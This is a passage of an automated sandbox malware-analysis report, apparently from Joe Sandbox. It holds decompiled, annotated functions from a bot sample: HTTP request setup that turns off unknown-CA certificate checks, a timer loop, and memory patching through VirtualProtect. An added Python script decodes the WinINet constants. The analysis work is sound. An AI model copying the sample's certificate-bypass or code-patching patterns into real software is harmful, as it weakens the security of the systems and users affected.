                           			// +0 server name, +4 object path, +0x10 hInternet, +0x14 hConnect,
                           			// +0x18 hRequest, +0x1c event signalled by the status callback.
                           			// _a4 is the User-Agent string. Returns 0 on success, else GetLastError().
                           			E01007AF1(void* __eax, void* __ecx, long __esi, char* _a4) {
                           				void _v8;
                           				long _v12;
                           				void _v16;
                           				void* _t34;
                           				void* _t38;
                           				void* _t40;
                           				char* _t56;
                           				long _t57;
                           				void* _t58;
                           				intOrPtr _t59;
                           				long _t65;
                           
                           				_t65 = __esi;
                           				_t58 = __ecx;
                           				_v16 = 0xea60; // 60000 ms, the send/receive timeout applied below
                           				__imp__( *(__esi + 4)); // lstrlen(path), see the APIs list (ref 01007B03)
                           				_v12 = __eax + __eax;
                           				_t56 = E01006D63(__eax + __eax + 1); // heap buffer of 2*len+1 bytes (RtlAllocateHeap wrapper)
                           				if(_t56 != 0) {
                           					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                           						E01006C2C(_t56); // canonicalisation failed: free the new buffer (RtlFreeHeap wrapper)
                           					} else {
                           						E01006C2C( *(__esi + 4)); // swap the path for its canonical form
                           						 *(__esi + 4) = _t56;
                           					}
                           				}
                           				// dwAccessType 0 = INTERNET_OPEN_TYPE_PRECONFIG (system proxy settings), 0x10000000 = INTERNET_FLAG_ASYNC
                           				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                           				 *(_t65 + 0x10) = _t34;
                           				// E01007A86 is the async status callback; 0xffffffff = INTERNET_INVALID_STATUS_CALLBACK
                           				if(_t34 == 0 || InternetSetStatusCallback(_t34, E01007A86) == 0xffffffff) {
                           					L15:
                           					return GetLastError();
                           				} else {
                           					ResetEvent( *(_t65 + 0x1c));
                           					// port 0x50 = 80, service 3 = INTERNET_SERVICE_HTTP, dwContext = the context block itself
                           					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                           					 *(_t65 + 0x14) = _t38;
                           					// 0x3e5 = ERROR_IO_PENDING: the async call is still in flight, E01006E40 waits on the event for up to 60 s
                           					if(_t38 != 0 || GetLastError() == 0x3e5 && E01006E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                           						_t59 =  *0x100a348; // 0x428d5a8
                           						_t15 = _t59 + 0x100b73b; // 0x544547 reads as the bytes "GET" in little-endian order
                           						_v8 = 0x84404000;
                           						// 0x84404000 = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE |
                           						//              INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
                           						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                           						 *(_t65 + 0x18) = _t40;
                           						if(_t40 == 0) {
                           							goto L15;
                           						}
                           						_t57 = 4;
                           						_v12 = _t57;
                           						// 0x1f = INTERNET_OPTION_SECURITY_FLAGS; OR-ing in 0x100 = SECURITY_FLAG_IGNORE_UNKNOWN_CA makes
                           						// WinINet accept a server certificate from an untrusted issuer. It only matters for TLS
                           						// requests; this request is plain HTTP on port 80.
                           						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                           							_v8 = _v8 | 0x00000100;
                           							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                           						}
                           						// 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5 = INTERNET_OPTION_SEND_TIMEOUT, both 60000 ms
                           						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                           							goto L15;
                           						} else {
                           							return 0;
                           						}
                           					} else {
                           						goto L15;
                           					}
                           				}
                           			}

                          APIs
                          • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 01007B03
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 01007B26
                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 01007B4E
                          • InternetSetStatusCallback.WININET(00000000,01007A86), ref: 01007B65
                          • ResetEvent.KERNEL32(?), ref: 01007B77
                          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 01007B8A
                          • GetLastError.KERNEL32 ref: 01007B97
                          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 01007BDD
                          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 01007BFB
                          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 01007C1C
                          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 01007C28
                          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 01007C38
                          • GetLastError.KERNEL32 ref: 01007C42
                            • Part of subcall function 01006C2C: RtlFreeHeap.NTDLL(00000000,00000000,01005E1D,00000000,?,?,00000000), ref: 01006C38
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                           • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                          • String ID:
                          • API String ID: 2290446683-0
                          • Opcode ID: ebfffffa7f55695b5ce87c7658f10c965ae6f2b4b09160d3e1a340102d5b2b13
                          • Instruction ID: 81f9f34f5dfd44b988539ff9025ed682072754e295318464984831eb982dcc7b
                          • Opcode Fuzzy Hash: ebfffffa7f55695b5ce87c7658f10c965ae6f2b4b09160d3e1a340102d5b2b13
                          • Instruction Fuzzy Hash: 47416F71600708BFE7329F65DC49E9B7FB9EB85740F104969B6C2D2191D63AA644CB20
                          Uniqueness

                          Uniqueness Score: -1.00%
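The WinINet constants in E01007AF1 are easier to read once decoded. The script below is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own APIs lines for this function (copied inline as constructed input), names the flags and options from the public wininet.h values, and lists which certificate checks the sample switches off through INTERNET_OPTION_SECURITY_FLAGS. One assumption is this example's own: a small immediate printed for a string argument (00544547) is treated as the inline bytes of the string rather than a pointer, which the report does not state. All function names and the verdict helper are the example's, not the bot's or the sandbox's.

```python
"""Decode WinINet constants in a Joe Sandbox 'APIs' listing.

Added example, not part of the original report. The sample lines are copied
from the E01007AF1 API list; flag values are the public wininet.h constants.
Arguments the sandbox printed as '?' are left undecoded (None).
"""
import re

# Constructed input: the WinINet lines of the E01007AF1 API list, verbatim.
API_LINES = """\
• InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 01007B4E
• InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 01007B8A
• HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 01007BDD
• InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 01007BFB
• InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 01007C1C
• InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 01007C28
• InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 01007C38
"""

OPEN_FLAGS = {0x10000000: "INTERNET_FLAG_ASYNC", 0x01000000: "INTERNET_FLAG_FROM_CACHE"}
REQUEST_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00040000: "INTERNET_FLAG_NO_AUTH",
    0x00008000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
SECURITY_FLAGS = {
    0x00008000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTP",
    0x00004000: "SECURITY_FLAG_IGNORE_REDIRECT_TO_HTTPS",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
}
OPTIONS = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
           6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 0x1F: "INTERNET_OPTION_SECURITY_FLAGS"}
SERVICES = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
# Bits that make the client accept a certificate it should reject.
TLS_WEAKENING = {"SECURITY_FLAG_IGNORE_UNKNOWN_CA", "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
                 "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID", "SECURITY_FLAG_IGNORE_REVOCATION"}

LINE_RE = re.compile(r"•?\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def decode_flags(value, table):
    """Split a bitmask into named flags (highest bit first) plus any unnamed remainder."""
    names, rest = [], value
    for bit in sorted(table, reverse=True):
        if value & bit:
            names.append(table[bit])
            rest &= ~bit
    if rest:
        names.append("UNKNOWN_0x%08X" % rest)
    return names


def parse_line(line):
    """Return (api, module, [int or None per argument], ref_address) for one listing line."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a, 16) for a in m.group(3).split(",")]
    return m.group(1), m.group(2), args, int(m.group(4), 16)


def ascii_immediate(value):
    """Read a small immediate such as 0x544547 as little-endian bytes ('GET').
    Assumption of this example: the listing printed inline string bytes, not a pointer."""
    raw = value.to_bytes(4, "little").rstrip(b"\0")
    if raw and all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def annotate(line):
    """Decode the constants of one WinINet call; unknown ('?') arguments stay None."""
    parsed = parse_line(line)
    if parsed is None:
        return None
    api, _module, args, ref = parsed
    note = {"api": api, "ref": ref}
    if api == "InternetOpenA":
        note["flags"] = decode_flags(args[4], OPEN_FLAGS)
    elif api == "InternetConnectA":
        note["port"] = args[2]
        note["service"] = SERVICES.get(args[5], args[5])
    elif api == "HttpOpenRequestA":
        note["verb"] = ascii_immediate(args[1]) if args[1] is not None else None
        note["flags"] = decode_flags(args[6], REQUEST_FLAGS)
    elif api in ("InternetQueryOptionA", "InternetSetOptionA"):
        opt = args[1]
        note["option"] = OPTIONS.get(opt, opt)
        # For InternetSetOptionA the sandbox prints the DWORD the buffer points to.
        if opt == 0x1F and api == "InternetSetOptionA":
            note["security_flags"] = decode_flags(args[2], SECURITY_FLAGS)
        elif opt in (2, 5, 6):
            note["timeout_ms"] = args[2]
    return note


def annotate_listing(text):
    return [n for n in (annotate(l) for l in text.splitlines()) if n]


def tls_weakening_flags(notes):
    """Names of certificate checks disabled via INTERNET_OPTION_SECURITY_FLAGS, sorted."""
    found = set()
    for n in notes:
        found.update(set(n.get("security_flags", [])) & TLS_WEAKENING)
    return sorted(found)


if __name__ == "__main__":
    notes = annotate_listing(API_LINES)
    for n in notes:
        print(n)
    print("TLS checks disabled:", tls_weakening_flags(notes))
```

Run stand-alone it prints one dict per call and ends with `TLS checks disabled: ['SECURITY_FLAG_IGNORE_UNKNOWN_CA']`. The same decoder applies to any other function's APIs block in the report; the `UNKNOWN_0x...` remainder in `decode_flags` is what tells you a bit is not in the table rather than silently dropping it. Note that this particular request is plain HTTP (port 80, no INTERNET_FLAG_SECURE), so the weakened validation only takes effect if the bot ever issues the request over TLS.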

                          Control-flow Graph

                          Control-flow graph (edge list omitted): basic blocks 1007f35-100816f; calls RaiseException (three sites), LoadLibraryA, GetLastError, InterlockedExchange, FreeLibrary, LocalAlloc and GetProcAddress.
                          C-Code - Quality: 51%
                           			// MSVC delay-load import helper (__delayLoadHelper2): compiler runtime, not bot logic.
                           			// _a4 is the ImgDelayDescr (RVA fields, hence + 0x1000000, the image base), _a8 the
                           			// address of the IAT slot being resolved. The pointers at 0x100a1c0 and 0x100a1bc are
                           			// __pfnDliNotifyHook2 and __pfnDliFailureHook2; they receive dliStartProcessing (0),
                           			// dliNotePreLoadLibrary (1), dliNotePreGetProcAddress (2), dliFailLoadLib (3),
                           			// dliFailGetProc (4) and dliNoteEndProcessing (5) with the DelayLoadInfo at &_v72.
                           			E01007F35(long _a4, long _a8) {
                           				signed int _v8;
                           				intOrPtr _v16;
                           				LONG* _v28;
                           				long _v40;
                           				long _v44;
                           				long _v48;
                           				CHAR* _v52;
                           				long _v56;
                           				CHAR* _v60;
                           				long _v64;
                           				signed int* _v68;
                           				char _v72;
                           				signed int _t76;
                           				signed int _t80;
                           				signed int _t81;
                           				intOrPtr* _t82;
                           				intOrPtr* _t83;
                           				intOrPtr* _t85;
                           				intOrPtr* _t90;
                           				intOrPtr* _t95;
                           				intOrPtr* _t98;
                           				struct HINSTANCE__* _t99;
                           				void* _t102;
                           				intOrPtr* _t104;
                           				void* _t115;
                           				long _t116;
                           				void _t125;
                           				void* _t131;
                           				signed short _t133;
                           				struct HINSTANCE__* _t138;
                           				signed int* _t139;
                           
                           				_t139 = _a4;
                           				_v28 = _t139[2] + 0x1000000; // rvaHmod: where the module handle is cached
                           				_t115 = _t139[3] + 0x1000000; // rvaIAT
                           				_t131 = _t139[4] + 0x1000000; // rvaINT
                           				_v8 = _t139[7]; // dwTimeStamp of the DLL the bound IAT was built against
                           				_v60 = _t139[1] + 0x1000000; // rvaDLLName
                           				_v16 = _t139[5] + 0x1000000; // rvaBoundIAT
                           				_v64 = _a8;
                           				_v72 = 0x24; // DelayLoadInfo.cb = sizeof(DelayLoadInfo) on x86
                           				_v68 = _t139;
                           				_v56 = 0;
                           				asm("stosd");
                           				_v48 = 0;
                           				_v44 = 0;
                           				_v40 = 0;
                           				if(( *_t139 & 0x00000001) == 0) { // grAttrs must carry dlattrRva
                           					_a8 =  &_v72;
                           					RaiseException(0xc06d0057, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_INVALID_PARAMETER)
                           					return 0;
                           				}
                           				_t138 =  *_v28;
                           				_t76 = _a8 - _t115 >> 2 << 2; // byte offset of the slot inside the IAT
                           				_t133 =  *(_t131 + _t76); // matching INT entry
                           				_a4 = _t76;
                           				_t80 =  !(_t133 >> 0x1f) & 0x00000001; // IMAGE_ORDINAL_FLAG32 clear: import by name
                           				_v56 = _t80;
                           				_t81 = _t133 + 0x1000002; // IMAGE_IMPORT_BY_NAME->Name (the 2-byte Hint is skipped)
                           				if(_t80 == 0) {
                           					_t81 = _t133 & 0x0000ffff; // otherwise the ordinal
                           				}
                           				_v52 = _t81;
                           				_t82 =  *0x100a1c0; // 0x0
                           				_t116 = 0;
                           				if(_t82 == 0) {
                           					L6:
                           					if(_t138 != 0) {
                           						L18:
                           						_t83 =  *0x100a1c0; // 0x0
                           						_v48 = _t138;
                           						if(_t83 != 0) {
                           							_t116 =  *_t83(2,  &_v72); // dliNotePreGetProcAddress: the hook may supply the address
                           						}
                           						if(_t116 != 0) {
                           							L32:
                           							 *_a8 = _t116; // patch the IAT slot so later calls go straight to the target
                           							L33:
                           							_t85 =  *0x100a1c0; // 0x0
                           							if(_t85 != 0) {
                           								_v40 = _v40 & 0x00000000;
                           								_v48 = _t138;
                           								_v44 = _t116;
                           								 *_t85(5,  &_v72); // dliNoteEndProcessing
                           							}
                           							return _t116;
                           						} else {
                           							if(_t139[5] == _t116 || _t139[7] == _t116) { // no bound IAT or no timestamp: resolve by name
                           								L27:
                           								_t116 = GetProcAddress(_t138, _v52);
                           								if(_t116 == 0) {
                           									_v40 = GetLastError();
                           									_t90 =  *0x100a1bc; // 0x0
                           									if(_t90 != 0) {
                           										_t116 =  *_t90(4,  &_v72); // dliFailGetProc
                           									}
                           									if(_t116 == 0) {
                           										_a4 =  &_v72;
                           										RaiseException(0xc06d007f, _t116, 1,  &_a4); // VcppException(ERROR_SEVERITY_ERROR, ERROR_PROC_NOT_FOUND)
                           										_t116 = _v44;
                           									}
                           								}
                           								goto L32;
                           							} else {
                           								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138; // IMAGE_NT_HEADERS of the loaded DLL
                           								// the bound address is trusted only if the DLL is "PE", its TimeDateStamp matches
                           								// the descriptor and it was loaded at its preferred ImageBase
                           								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                           									_t116 =  *(_a4 + _v16);
                           									if(_t116 != 0) {
                           										goto L32;
                           									}
                           								}
                           								goto L27;
                           							}
                           						}
                           					}
                           					_t98 =  *0x100a1c0; // 0x0
                           					if(_t98 == 0) {
                           						L9:
                           						_t99 = LoadLibraryA(_v60); // executed
                           						_t138 = _t99;
                           						if(_t138 != 0) {
                           							L13:
                           							if(InterlockedExchange(_v28, _t138) == _t138) {
                           								FreeLibrary(_t138); // another thread already cached the same handle
                           							} else {
                           								if(_t139[6] != 0) { // rvaUnloadIAT present: link the descriptor into the unload list
                           									_t102 = LocalAlloc(0x40, 8);
                           									if(_t102 != 0) {
                           										 *(_t102 + 4) = _t139;
                           										_t125 =  *0x100a1b8; // 0x0
                           										 *_t102 = _t125;
                           										 *0x100a1b8 = _t102;
                           									}
                           								}
                           							}
                           							goto L18;
                           						}
                           						_v40 = GetLastError();
                           						_t104 =  *0x100a1bc; // 0x0
                           						if(_t104 == 0) {
                           							L12:
                           							_a8 =  &_v72;
                           							RaiseException(0xc06d007e, 0, 1,  &_a8); // VcppException(ERROR_SEVERITY_ERROR, ERROR_MOD_NOT_FOUND)
                           							return _v44;
                           						}
                           						_t138 =  *_t104(3,  &_v72); // dliFailLoadLib: the hook may supply a module handle
                           						if(_t138 != 0) {
                           							goto L13;
                           						}
                           						goto L12;
                           					}
                           					_t138 =  *_t98(1,  &_v72); // dliNotePreLoadLibrary
                           					if(_t138 != 0) {
                           						goto L13;
                           					}
                           					goto L9;
                           				}
                           				_t116 =  *_t82(0,  &_v72); // dliStartProcessing: a nonzero return short-circuits the whole resolve
                           				if(_t116 != 0) {
                           					goto L33;
                           				}
                           				goto L6;
                           			}

                          APIs
                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01007FAE
                          • LoadLibraryA.KERNEL32(?), ref: 0100802B
                          • GetLastError.KERNEL32 ref: 01008037
                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0100806A
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                           • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                           • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                          • String ID: $
                          • API String ID: 948315288-3993045852
                          • Opcode ID: 33ad716bb5510e1cf21e6ba55f463ab6308b0d82776ddf91e2b5ba74411cd007
                          • Instruction ID: dbb9d0fc99cc1be43139ece6e9bb4764a60861d09f5fcf21af4aff348f01868f
                          • Opcode Fuzzy Hash: 33ad716bb5510e1cf21e6ba55f463ab6308b0d82776ddf91e2b5ba74411cd007
                          • Instruction Fuzzy Hash: 42812C71A006059FEB62CF98D884BAEBBF5BF48310F10806AF585D7381E775E904CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Control-flow graph (edge list omitted): basic blocks 100661d-10067e4; calls memset, CreateWaitableTimerA, _allmul, SetWaitableTimer and WaitForMultipleObjects (two timer/wait sites), RtlFreeHeap, CloseHandle and GetLastError, plus the subroutines 100216c, 10043eb, 10070d8 and 100561e.
                          C-Code - Quality: 83%
                           			// Main loop. Arms a waitable timer with a relative due time computed by _allmul
                           			// (L0100824A) as seconds * -10,000,000 (100 ns units, negative = relative), then
                           			// WaitForMultipleObjects on {timer, handle at 0x100a30c}: WAIT_OBJECT_0 means the
                           			// timer fired, anything else (the second handle) leaves the loop through L12.
                           			E0100661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                          				void _v48;
                          				long _v52;
                          				struct %anon52 _v60;
                          				char _v72;
                          				long _v76;
                          				void* _v80;
                          				union _LARGE_INTEGER _v84;
                          				struct %anon52 _v92;
                          				void* _v96;
                          				void* _v100;
                          				union _LARGE_INTEGER _v104;
                          				long _v108;
                          				struct %anon52 _v124;
                          				long _v128;
                          				struct %anon52 _t46;
                          				void* _t51;
                          				long _t53;
                          				void* _t54;
                          				struct %anon52 _t61;
                          				long _t65;
                          				struct %anon52 _t66;
                          				intOrPtr _t68;
                          				void* _t69;
                          				void* _t73;
                          				signed int _t74;
                          				void* _t76;
                          				void* _t78;
                          				void** _t82;
                          				signed int _t86;
                          				void* _t89;
                          
                          				_t76 = __edx;
                          				_v52 = 0;
                          				memset( &_v48, 0, 0x2c);
                          				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                          				_t46 = CreateWaitableTimerA(0, 1, 0);
                          				_v60 = _t46;
                          				if(_t46 == 0) {
                          					_v92.HighPart = GetLastError();
                          				} else {
                           					_push(0xffffffff);
                           					_push(0xff676980); // 0xffffffff:ff676980 = -10,000,000 = one second, relative
                           					_push(0);
                           					_push( *0x100a2e0); // configured delay in seconds
                           					_v76 = 0;
                           					_v80 = 0;
                           					L0100824A(); // _allmul: edx:eax = -(seconds * 10,000,000), the relative due time
                           					_v84.LowPart = _t46;
                           					_v80 = _t76;
                           					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                           					_t51 =  *0x100a30c; // 0x2d0
                           					_v76 = _t51;
                           					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff); // INFINITE; 0 = timer fired, 1 = second handle signalled
                          					_v108 = _t53;
                          					if(_t53 == 0) {
                          						if(_a8 != 0) {
                          							L4:
                          							 *0x100a2ec = 5;
                          						} else {
                          							_t69 = E0100216C(_t76); // executed
                          							if(_t69 != 0) {
                          								goto L4;
                          							}
                          						}
                          						_v104.LowPart = 0;
                          						L6:
                          						L6:
                          						if(_v104.LowPart == 1 && ( *0x100a300 & 0x00000001) == 0) {
                          							_v104.LowPart = 2;
                          						}
                          						_t74 = _v104.LowPart;
                          						_t58 = _t74 << 4;
                          						_t78 = _t89 + (_t74 << 4) + 0x38;
                          						_t75 = _t74 + 1;
                          						_v92.LowPart = _t74 + 1;
                          						_t61 = E010043EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                          						_v124 = _t61;
                          						if(_t61 != 0) {
                          							goto L17;
                          						}
                          						_t66 = _v92;
                          						_v104.LowPart = _t66;
                          						if(_t66 != 3) {
                          							goto L6;
                          						} else {
                          							_t68 = E010070D8(_t75,  &_v72, _a4, _a8); // executed
                          							_v124.HighPart = _t68;
                          						}
                          						goto L12;
                          						L17:
                          						__eflags = _t61 - 0x10d2;
                          						if(_t61 != 0x10d2) {
                          							_push(0xffffffff);
                          							_push(0xff676980);
                          							_push(0);
                          							_push( *0x100a2e4);
                          							goto L21;
                          						} else {
                          							__eflags =  *0x100a2e8; // 0x0
                          							if(__eflags == 0) {
                          								goto L12;
                          							} else {
                          								_t61 = E0100561E();
                          								_push(0xffffffff);
                          								_push(0xdc3cba00);
                          								_push(0);
                          								_push( *0x100a2e8);
                          								L21:
                          								L0100824A();
                          								_v104.LowPart = _t61;
                          								_v100 = _t78;
                          								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                          								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                          								_v128 = _t65;
                          								__eflags = _t65;
                          								if(_t65 == 0) {
                          									goto L6;
                          								} else {
                          									goto L12;
                          								}
                          							}
                          						}
                          						L25:
                          					}
                          					L12:
                          					_t82 =  &_v72;
                          					_t73 = 3;
                          					do {
                          						_t54 =  *_t82;
                          						if(_t54 != 0) {
                          							RtlFreeHeap( *0x100a2d8, 0, _t54); // executed
                          						}
                          						_t82 =  &(_t82[4]);
                          						_t73 = _t73 - 1;
                          					} while (_t73 != 0);
                          					CloseHandle(_v80);
                          				}
                          				return _v92.HighPart;
                          				goto L25;
			}

Instruction addresses (shown beside each line of the C-code above on the original page): 0x0100661d to 0x010067e4; 0x00000000 marks lines that have no instruction of their own.

                          APIs
                          • memset.NTDLL ref: 01006637
                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 01006643
                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0100666B
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0100668B
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,01003EE8,?), ref: 010066A6
                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,01003EE8,?,00000000), ref: 0100674D
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01003EE8,?,00000000,?,?), ref: 0100675D
                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 01006797
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 010067B1
                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 010067BD
                            • Part of subcall function 0100216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05299400,00000000,?,76CDF710,00000000,76CDF730), ref: 010021BB
                            • Part of subcall function 0100216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05299438,?,00000000,30314549,00000014,004F0053,052993F4), ref: 01002258
                            • Part of subcall function 0100216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,010066BE), ref: 0100226A
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,01003EE8,?,00000000,?,?), ref: 010067D0
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                          • String ID:
                          • API String ID: 3521023985-0
                          • Opcode ID: f1320e3842e2706fdabc106de03b87684ca65ed672ce36ebd4d6d0655b8febfd
                          • Instruction ID: 02343125f6d1206dd22fbb70bd5e9f7b7f1a4973cac6013bacc82f2237109f48
                          • Opcode Fuzzy Hash: f1320e3842e2706fdabc106de03b87684ca65ed672ce36ebd4d6d0655b8febfd
                          • Instruction Fuzzy Hash: 04519E70509320AFE762EF19DC44DABBBE9FB88320F008A1AF4D882190D7768514CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

Control-flow Graph

• Graph rendered on the original page (executed and not-executed blocks are colour-coded there): basic blocks 5b61a0a to 5b61b70, calling 5b83d64 and 5b83d9f, with API nodes lstrlen, VirtualProtect, lstrcpy and GetLastError.
                          APIs
                          • lstrlen.KERNEL32(?,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977,05B7893A,?,?), ref: 05B61A58
                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A6A
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B61A79
                          • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000,?,00000000,05B80977), ref: 05B61A8A
                          • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,05B86040,00000018,05B634DB,?,00000000,?,05B819C5,05B894D8,?,?,00000004,00000000), ref: 05B61AC1
